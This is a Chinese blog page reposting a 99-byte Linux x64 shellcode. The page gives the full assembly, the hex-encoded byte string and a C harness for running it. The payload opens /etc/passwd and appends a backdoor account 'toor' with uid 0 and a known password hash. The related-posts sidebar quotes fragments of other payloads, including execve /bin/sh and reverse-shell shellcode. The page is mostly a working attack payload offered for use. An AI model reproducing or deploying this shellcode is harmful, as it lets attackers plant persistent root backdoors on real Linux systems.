linux x64 shellcode,Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)

最新推荐文章于 2022-04-29 20:39:09 发布
最新推荐文章于 2022-04-29 20:39:09 发布
阅读量130 收藏
点赞数
文章标签: linux x64 shellcode

; Title: add root user (toor:toor)

; Date: 20180811

; Author: epi

; https://epi052.gitlab.io/notes-to-self/

; Tested on: linux/x86_64 (SMP CentOS-7 3.10.0-862.2.3.el7.x86_64 GNU/Linux)

;

; Shellcode Length: 99 bytes

; Action: Adds a user into /etc/passwd with the following information

; username: toor

; password: toor

; uid: 0

; gid: 0

; home: /root

; shell: /bin/sh

;

; toor:sXuCKi7k3Xh/s:0:0::/root:/bin/sh

global _start

section .text

_start:

; #define __NR_open 2

; int open(const char *pathname, int flags);

; rax -> 2

; rdi -> /etc/passwd

; rsi -> 0x401

;

; >>> hex(os.O_WRONLY ^ os.O_APPEND)

; 0x401

xor ebx, ebx

mul ebx ; rax|rdx -> 0x0

push rax

mov ebx, 0x647773ff ; swd

shr ebx, 0x08

push rbx

mov rbx, 0x7361702f6374652f ; /etc/pas

push rbx

mov rdi, rsp ; rdi -> /etc/passwd

xchg esi, edx ; swap registers to zero out rsi

mov si, 0x401 ; rsi -> O_WRONLY|O_APPEND

add al, 0x2 ; rax -> 2 (open)

syscall ; open

xchg rdi, rax ; save returned fd

jmp short get_entry_address ; start jmp-call-pop

write_entry:

; #define __NR_write 1

; ssize_t write(int fd, const void *buf, size_t count);

; rax -> 1

; rdi -> results of open syscall

; rsi -> user's entry

; rdx -> len of user's entry

pop rsi ; end jmp-call-pop, rsi -> user's entry

push 0x1

pop rax ; rax -> 1

push 38 ; length + 1 for newline

pop rdx ; rdx -> length of user's entry

syscall ; write

; #define __NR_exit 60

; void _exit(int status);

; rax -> 60

; rdi -> don't care

push 60

pop rax

syscall ; OS will handle closing fd at exit

get_entry_address:

call write_entry

user_entry: db "toor:sXuCKi7k3Xh/s:0:0::/root:/bin/sh",0xa

; if the user_entry above is modified, change the _count_ argument in the write call to match the new length

; openssl passwd -crypt

; Password: toor

; Verifying - Password: toor

; sXuCKi7k3Xh/s

; Skeleton for testing

;

; gcc -fno-stack-protector -z execstack shellcode-skeleton.c -o shellcode-skeleton

;

; #include

; #include

;

; unsigned char shellcode[] = \

; "\x31\xdb\xf7\xe3\x50\xbb\xff\x73\x77\x64\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63\x2f\x70\x61\x73\x53\x48\x89\xe7\x87\xf2\x66\xbe\x01\x04\x04\x02\x0f\x05\x48\x97\xeb\x0e\x5e\x6a\x01\x58\x6a\x26\x5a\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xed\xff\xff\xff\x74\x6f\x6f\x72\x3a\x73\x58\x75\x43\x4b\x69\x37\x6b\x33\x58\x68\x2f\x73\x3a\x30\x3a\x30\x3a\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a";

;

; int main() {

; printf("Shellcode length: %zu\n", strlen(shellcode));

; int (*ret)() = (int(*)())shellcode;

; ret();

; }

看不见的天边
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux x86_64 缓冲区溢出分析 以及 shellcode简介
shuimuyq的专栏
01-15 1839
/* buger.c */ #include #include #include int main(void) { char buffer[128] = {0}; char *envp = NULL; printf("buffer address is: %p\n", &buffer); envp = getenv("KIRIKA"); if (envp) strcpy
linux x64 shellcode,N/A Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567...
weixin_31586247的博客
05-12 135
global _start_start:; sock = socket(AF_INET, SOCK_STREAM, 0); AF_INET = 2; SOCK_STREAM = 1; syscall number 41push 41pop raxpush 2pop rdipush 1pop rsicdqsyscall; copy socket descriptor to rdi for futur...
[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)
「鸿渐之翼」的博客
04-29 2388
免责声明: 本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。 Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes) * reverse shell tcp (1907) port shellcode C language - Linux/x86_64 Author : Kağan Çapar contact:
栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(二)shellcode
沧海一粟
02-23 9507
栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(二)shellcode
linux下执行shellcode
天元喜羊羊的博客
01-23 5384
参考了其他文章。   C语言代码如下: #include #include char sc[] = "\x31\xc0" "\x50" "\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\xb0\x0b" "\
SLAE64:x64 Linux Shellcode
07-04
SLAE64,全称是“64位结构化低级编程认证”(64-bit Structure of Applied Encryption),是一项专注于安全领域低级编程技术的认证,特别是涉及到x64架构下的Linux shellcode编写。Shellcode是一种特殊的恶意代码,...
使用xshellex,您可以在x64dbg,ollydbg和抗扰度调试器中粘贴任何类型的c-shellcode字符串-C/C++开发
05-27
xshellex警告:世界上最丑陋的代码使用xshellex,您可以在x64dbg,ollydbg和抗扰度调试器中粘贴任何类型的c-shellcode字符串。 Al xshellex警告:世界上最丑陋的代码使用xshellex,您可以在x64dbg,ollydbg和抗扰度...
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
最新发布
09-20
标题"此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell"表明包含的源代码是专门设计用来在Linux x86系统上生成shellcode的。"rar"文件可能是源代码的压缩包,而"shellcode_shell"可能指的是该...
pe_to_shellcode:将PE转换为Shellcode
05-09
pe_to_shellcode 转换PE,以便可以像普通shellcode一样将其注入。 (同时,输出文件仍然是有效的PE)。 同时支持32位和64位PE 作者: 和 客观的 该项目的目标是提供一种生成PE文件的可能性,该文件可以轻松完成...
WinREPL:适用于Windows的x86和x64程序集“ read-eval-print loop”外壳
02-05
WinREPL是一款专为Windows平台设计的x86和x64程序集调试工具,它提供了"read-eval-print loop"(REPL)环境。在编程领域,REPL是一种交互式编程模型,允许用户输入代码,立即执行并查看结果,这对于测试、调试以及...
栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(一)函数如何执行
沧海一粟
02-23 3961
栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(一)函数如何执行
X64 ShellCode 介绍(翻译)
商少
07-24 2176
X64 ShellCode 介绍(翻译)原文链接 http://mcdermottcybersecurity.com/articles/windows-x64-shellcode介绍       Shellcode是指通过缓冲区溢出类型的安全漏洞将其注入到进程的内存中之后执行的可执行机器代码(以及任何相关数据)。该术语来自早期的一种情况“针对unix 平台的早期攻击中,攻击者通常会执行‘启动she
Linux shellcode 编写入门 (转)
yitian20000的专栏
03-22 1295
<br /><br />刺猬@http://blog.csdn.net/littlehedgehog<br /><br /> <br /> <br /> <br />无意当中在安全焦点上面看到的,很入门的一篇文章,不错:<br />原文地址:<br />http://www.xfocus.net/articles/200805/980.html<br /><br /><br /><br /><br /><br />一:什么是shellcode   话说某天某爱国黑客编译了一个Nday溢出利用程序来攻击CN
linux/ubuntu下su进入toor用户提示“认证失败”的解决方案
gent__chen的博客
09-26 993
安装Ubuntu时root用户系统是保留的,默认是不设置root的。这是有些需要root权限的操作是执行不了的。当使用su root进入时,会提示认证失败的错误。这时我们需要设置root的密码。   1:输入 sudo passwd root 2:输入用户密码(安装时设置的) 3:输入想设置的root密码 4:再次输入root密码 enter结束 就成功了 这样就可以使用root
linux x64 shellcode,栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(二)shellcode...
weixin_42386033的博客
05-12 514
shellcode 是一组指令opcode, 是可以被程序运行,因为shellcode是要直接操作寄存器和函数,所以opcode 必须是十六进制的形式。既然是攻击,那shellcode 主要的目的是调用系统函数,而在x86下 在linux下有两种方式。第一种是通过直接调用中断 int 0x80进入内核态,从而达到调用目的。第二种是通过调用libc里syscall(64位)和sysenter(32位...
Linux 64位 shellcode
weixin_44442852的博客
10-20 1429
linux exec /bin/sh unsigned char code[] = "\x6a\x3b\x58\x99\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48" "\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f" "\x05"; int main(int argc, ch...
linux手写x64shellcode
小小鱼的博客
08-25 1171
编写汇编代码 下面的代码实现的是执行 execve("/bin/sh") 命令,rax寄存器存放execve的系统调用编号,rdi存放的是execve的参数: section .text global _start _start: push rax xor rdx, rdx xor rsi, rsi mov rbx,'/bin//sh' push rbx push rsp pop rdi mov al, 59 syscall 关于x64的系统调用表可参考如下博文: https://blog.csdn.ne
浅入浅出Liunx Shellcode
weixin_34033624的博客
05-15 207
/*————————————-Author:旋木木[[email]xuanmumu@gmail.com[/email]]Date:2008/05/12Website:[url]www.bugshower.org[/url]————————————–*/ 一:什么是shellcode话说某天某爱国***编译了一个Nday溢出利用程序来***CNN,输入IP并且enter之后发现...
64位shellcode编程(不错) Windows x64 Shellcode
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
12-06 3997
原文链接:http://mcdermottcybersecurity.com/articles/windows-x64-shellcode Windows x64 Shellcode January 11, 2011 Contents Introduction RIP-Relative Addressing API Lookup
CVE-2013-3660:x64平台提权漏洞分析与利用
CVE-2013-3660的分析和利用涉及x64平台的内存管理、指针安全以及shellcode部署等复杂技术。理解和复现这样的EXP编写过程,对于深入理解操作系统安全和逆向工程至关重要。对于安全研究人员和开发者来说,学习这些技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值